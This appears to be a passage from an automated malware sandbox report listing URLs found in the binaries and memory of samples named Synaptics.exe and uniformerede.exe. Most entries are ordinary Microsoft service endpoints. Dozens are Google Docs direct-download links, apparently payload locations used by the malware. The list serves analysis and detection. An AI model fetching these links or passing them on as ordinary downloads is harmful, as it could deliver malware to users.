                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://api.powerbi.com/beta/myorg/imports
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://apis.live.net/v5.0/
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://arc.msn.com/v4/api/selection
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://augloop.office.com
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://augloop.office.com/v2
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://autodiscover-s.outlook.com/
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://cdn.entity.
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://client-office365-tas.msedge.net/ab
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://clients.config.office.net/
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://clients.config.office.net/c2r/v1.0/InteractiveInstallation
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://clients.config.office.net/user/v1.0/ios
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://clients.config.office.net/user/v1.0/mac
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://config.edge.skype.com
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://config.edge.skype.com/config/v1/Office
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://config.edge.skype.com/config/v2/Office
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://cortana.ai
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://cortana.ai/api
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://cr.office.com
                                Source: Synaptics.exe, 00000009.00000000.368763752.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000003.344709238.00000000054EB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://dataservice.o365filtering.com
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://dataservice.o365filtering.com/
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://dev.cortana.ai
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://dev0-api.acompli.net/autodetect
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://devnull.onenote.com
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://directory.services.
                                Source: Synaptics.exe, 00000009.00000000.370263622.0000000005DCD000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://docs.goog
                                Source: Synaptics.exe, 00000009.00000000.353368197.0000000005494000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/0
                                Source: Synaptics.exe, 00000009.00000000.368763752.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/dr
                                Source: uniformerede.exe, 00000006.00000003.286322922.0000000002210000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=downlo
                                Source: RCXDA77.tmp.9.drString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=download
                                Source: Synaptics.exe, 00000009.00000000.350557009.00000000021E0000.00000004.00001000.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.357490239.00000000021E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=downloadN
                                Source: Synaptics.exe, 00000009.00000000.361451571.000000000868E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.357737287.000000000757E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.359584810.0000000009BDE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.411248230.0000000008E1E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.352590518.0000000004F2D000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.362549509.0000000009A9E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.371349676.00000000091DE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.352795877.000000000530D000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.351426688.000000000476D000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.411631790.000000000945E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.371160417.0000000008F5E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.360559351.000000000743E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.410996975.000000000891E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.354553381.0000000005F0E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.384503032.00000000096DE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.358342707.000000000818E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.371594629.000000000959E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.373669676.00000000076BE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408212313.000000000506D000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.385722874.000000000A49E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408502135.000000000568D000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&expo
                                Source: uniformerede.exe, 00000006.00000003.286322922.0000000002210000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downlo$
                                Source: RCXDA77.tmp.9.drString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                Source: Synaptics.exe, 00000009.00000000.354060181.00000000054DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.368763752.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download$
                                Source: Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download)
                                Source: Synaptics.exe, 00000009.00000000.354060181.00000000054DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.369282651.0000000007970000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.409428989.0000000007970000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.368763752.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download-
                                Source: Synaptics.exe, 00000009.00000000.353368197.0000000005494000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download-a
                                Source: Synaptics.exe, 00000009.00000000.369282651.0000000007970000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.409428989.0000000007970000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download0
                                Source: Synaptics.exe, 00000009.00000000.353930908.00000000054BB000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.368763752.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download0Y6
                                Source: Synaptics.exe, 00000009.00000000.354060181.00000000054DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.368763752.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download1
                                Source: Synaptics.exe, 00000009.00000000.354060181.00000000054DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.368763752.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download2
                                Source: Synaptics.exe, 00000009.00000000.353368197.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.368763752.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download7
                                Source: Synaptics.exe, 00000009.00000000.353054699.0000000005450000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.358069688.0000000005450000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408273761.0000000005450000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download8
                                Source: Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download9
                                Source: Synaptics.exe, 00000009.00000000.354060181.00000000054DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.368763752.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download:
                                Source: Synaptics.exe, 00000009.00000000.369282651.0000000007970000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.409428989.0000000007970000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download?
                                Source: Synaptics.exe, 00000009.00000000.353930908.00000000054BB000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.368763752.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download?Y#
                                Source: Synaptics.exe, 00000009.00000000.354060181.00000000054DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.368763752.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadA
                                Source: Synaptics.exe, 00000009.00000000.354060181.00000000054DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.353368197.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.368763752.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadC
                                Source: Synaptics.exe, 00000009.00000000.353930908.00000000054BB000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.368763752.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadCZ
                                Source: Synaptics.exe, 00000009.00000000.354060181.00000000054DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.368763752.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadE
                                Source: Synaptics.exe, 00000009.00000000.354060181.00000000054DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.368763752.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadF
                                Source: Synaptics.exe, 00000009.00000000.354060181.00000000054DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.368763752.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadI#N
                                Source: Synaptics.exe, 00000009.00000000.350557009.00000000021E0000.00000004.00001000.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.357490239.00000000021E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadJ
                                Source: Synaptics.exe, 00000009.00000000.353368197.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.368763752.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadJx
                                Source: Synaptics.exe, 00000009.00000000.369282651.0000000007970000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.409428989.0000000007970000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadK
                                Source: Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadM
                                Source: Synaptics.exe, 00000009.00000000.353930908.00000000054BB000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.368763752.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadNZ
                                Source: Synaptics.exe, 00000009.00000000.353368197.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.368763752.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadNw
                                Source: Synaptics.exe, 00000009.00000000.369282651.0000000007970000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.409428989.0000000007970000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadQ
                                Source: Synaptics.exe, 00000009.00000000.354060181.00000000054DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.368763752.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadS
                                Source: Synaptics.exe, 00000009.00000000.353368197.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.368763752.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadT
                                Source: Synaptics.exe, 00000009.00000000.354060181.00000000054DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.368763752.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadU#Z
                                Source: Synaptics.exe, 00000009.00000000.353054699.0000000005450000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.358069688.0000000005450000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408273761.0000000005450000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadV
                                Source: Synaptics.exe, 00000009.00000000.353368197.0000000005494000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadVx
                                Source: Synaptics.exe, 00000009.00000000.354060181.00000000054DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.368763752.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadZ=
                                Source: Synaptics.exe, 00000009.00000000.353368197.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.368763752.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadZw
                                Source: Synaptics.exe, 00000009.00000000.353054699.0000000005450000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.358069688.0000000005450000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.353930908.00000000054BB000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.368763752.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408273761.0000000005450000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download_
                                Source: Synaptics.exe, 00000009.00000000.354060181.00000000054DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.368763752.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadana
                                Source: Synaptics.exe, 00000009.00000000.354060181.00000000054DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.368763752.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadblY
                                Source: Synaptics.exe, 00000009.00000000.353368197.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.368763752.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadbw
                                Source: Synaptics.exe, 00000009.00000000.354060181.00000000054DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.368763752.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloaddn
                                Source: Synaptics.exe, 00000009.00000000.354060181.00000000054DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.368763752.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloade
                                Source: Synaptics.exe, 00000009.00000000.354060181.00000000054DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.368763752.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadeport
                                Source: Synaptics.exe, 00000009.00000000.354060181.00000000054DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.368763752.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadet
                                Source: Synaptics.exe, 00000009.00000000.354060181.00000000054DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.368763752.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadev
                                Source: Synaptics.exe, 00000009.00000000.353368197.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.368763752.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadg
                                Source: Synaptics.exe, 00000009.00000000.354060181.00000000054DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.368763752.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadgo
                                Source: Synaptics.exe, 00000009.00000000.354060181.00000000054DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.368763752.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadh
                                Source: Synaptics.exe, 00000009.00000000.354060181.00000000054DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.368763752.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadi
                                Source: Synaptics.exe, 00000009.00000000.354060181.00000000054DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.368763752.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadj
                                Source: Synaptics.exe, 00000009.00000000.369282651.0000000007970000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.409428989.0000000007970000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadk
                                Source: Synaptics.exe, 00000009.00000000.354060181.00000000054DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.368763752.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadn.
